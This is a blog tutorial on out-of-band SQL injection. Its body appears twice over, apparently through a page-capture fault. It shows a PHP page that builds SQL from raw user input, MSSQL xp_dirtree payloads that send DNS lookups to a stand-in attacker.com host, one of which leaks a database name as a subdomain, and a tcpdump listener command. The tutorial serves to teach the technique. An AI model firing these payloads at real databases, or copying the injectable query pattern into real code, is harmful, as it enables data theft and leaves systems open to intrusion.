Thilan Dissanayaka Web App Hacking Apr 26

Out of Band SQL Injection

Normally in SQL Injection, the attacker:

Sees direct errors, or

Infers information through page behavior or timing.

But Out-of-Band SQL Injection is different:

OOB SQLi relies on making the vulnerable database initiate a network connection (like HTTP or DNS) to an attacker-controlled server to leak data.

This is useful when:

Errors are hidden,

No differences in page behavior,

No timing differences.

Example:

The vulnerable server sends a DNS or HTTP request to attacker.com containing database data.

How Out-of-Band SQL Injection Works Some databases have functions that allow making external network connections:

Database Functions MySQL LOAD_FILE(), INTO OUTFILE, xp_dirtree() (when MySQL linked to MSSQL) Microsoft SQL Server xp_dirtree(), xp_fileexist() Oracle UTL_HTTP.REQUEST, UTL_INADDR.GET_HOST_ADDRESS An attacker can exploit these features to:

Force a DNS lookup

Trigger an HTTP request

Leak data through those requests.

Real-World Example Setup Imagine a PHP page like:

<?php
$id = $_GET['id'];
$query = "SELECT name, price FROM products WHERE id = '$id'";
$result = mysqli_query($conn, $query);
if (mysqli_num_rows($result) > 0) {
    $row = mysqli_fetch_assoc($result);
    echo "Product Name: " . $row['name'];
}
?>

Problems:

User input is directly injected into SQL

No output-based or time-based feedback

Example OOB SQL Injection Exploit Assume the database is MSSQL Server and has access to the internet. We can use the function xp_dirtree() to trigger a network request.

Injection payload:

What is Out-of-Band (OOB) SQL Injection? Normally in SQL Injection, the attacker:

Sees direct errors, or

Infers information through page behavior or timing.

But Out-of-Band SQL Injection is different:

OOB SQLi relies on making the vulnerable database initiate a network connection (like HTTP or DNS) to an attacker-controlled server to leak data.

This is useful when:

Errors are hidden,

No differences in page behavior,

No timing differences.

Example:

The vulnerable server sends a DNS or HTTP request to attacker.com containing database data.

How Out-of-Band SQL Injection Works Some databases have functions that allow making external network connections:

Database Functions MySQL LOAD_FILE(), INTO OUTFILE, xp_dirtree() (when MySQL linked to MSSQL) Microsoft SQL Server xp_dirtree(), xp_fileexist() Oracle UTL_HTTP.REQUEST, UTL_INADDR.GET_HOST_ADDRESS An attacker can exploit these features to:

Force a DNS lookup

Trigger an HTTP request

Leak data through those requests.

Real-World Example Setup Imagine a PHP page like:

<?php
$id = $_GET['id'];
$query = "SELECT name, price FROM products WHERE id = '$id'";
$result = mysqli_query($conn, $query);
if (mysqli_num_rows($result) > 0) {
    $row = mysqli_fetch_assoc($result);
    echo "Product Name: " . $row['name'];
}
?>

User input is directly injected into SQL

No output-based or time-based feedback

Example OOB SQL Injection Exploit Assume the database is MSSQL Server and has access to the internet. We can use the function xp_dirtree() to trigger a network request.

Injection payload:

'; EXEC master..xp_dirtree '\\attacker.com\test' --

Full URL:

http://victim.com/product.php?id='; EXEC master..xp_dirtree '\\attacker.com\test'--

What happens?

The database server tries to list the contents of the share \attacker.com\test

A DNS lookup happens for attacker.com

The attacker sees the request and knows the SQL injection worked!

Another Example: Leaking Data You can even exfiltrate data!

Example payload:

'; EXEC master..xp_dirtree '\\' + (SELECT TOP 1 name FROM master..sysdatabases) + '.attacker.com\abc' --

If the first database name is 'testdb', the database server will try to access:

testdb.attacker.com

If you monitor your domain’s DNS logs, you can see the database name!

Setting Up the Attacker's Server You need to set up:

A DNS listener (example: using tcpdump, dnsmasq, Burp Collaborator, or Interactsh)

Or a web server to catch HTTP requests.

Simple using tcpdump to catch DNS:

sudo tcpdump -i eth0 port 53

Or use public services like:

Interactsh (by Project Discovery)

Burp Collaborator client

They give you a domain like random.oastify.com, and log incoming requests.

'; EXEC master..xp_dirtree '\\attacker.com\test' --

Full URL:

http://victim.com/product.php?id='; EXEC master..xp_dirtree '\\attacker.com\test'--

What happens?

The database server tries to list the contents of the share \attacker.com\test

A DNS lookup happens for attacker.com

The attacker sees the request and knows the SQL injection worked!

Another Example: Leaking Data You can even exfiltrate data!

Example payload:

'; EXEC master..xp_dirtree '\\' + (SELECT TOP 1 name FROM master..sysdatabases) + '.attacker.com\abc' --

If the first database name is 'testdb', the database server will try to access:

testdb.attacker.com

If you monitor your domain’s DNS logs, you can see the database name!

Setting Up the Attacker's Server You need to set up:

A DNS listener (example: using tcpdump, dnsmasq, Burp Collaborator, or Interactsh)

Or a web server to catch HTTP requests.

Simple using tcpdump to catch DNS:

sudo tcpdump -i eth0 port 53

Or use public services like:

Interactsh (by Project Discovery)

Burp Collaborator client

They give you a domain like random.oastify.com, and log incoming requests.

ALSO READ
Building a Web3 CLI Tool for the Ballerina Language: From Idea to Reality
Apr 26 WSO2

🚀 Excited to finally share my journey of building a web3 CLI tool for Ballerina! This tool bridges the gap between Ethereum smart contracts and the Ballerina programming language by automatically....

How does SLL work?
May 17 Cryptography

Have you ever noticed the small padlock icon in your browser's address bar? That tiny symbol represents a powerful security technology called SSL that protects millions of online transactions every....

Writing a Shell Code for Linux
May 17 Exploit development

Shellcoding is the art of writing position-independent code that can be used as the payload in exploitation scenarios. In this guide, we'll explore how to write shellcode for x86 Linux systems,....

CI/CD concepts - Interview preparation guide
Jan 05 Interview Guides

## What is CI/CD? CI/CD stands for Continuous Integration and Continuous Delivery/Deployment. CI is the practice of automatically integrating code changes from multiple contributors into a....

Database Indexing: Speeding Up Your Queries Like a Pro
Apr 26 Database Systems

In the world of databases, speed matters. Whether you're powering an e-commerce store, a social media app, or a business dashboard — users expect data to load instantly. That’s where database....

Boolean based Blind SQL Injection
Apr 26 Web App Hacking

Blind SQL Injection happens when: There is a SQL injection vulnerability, BUT the application does not show any SQL errors or query outputs directly. In this case, an attacker has to ask....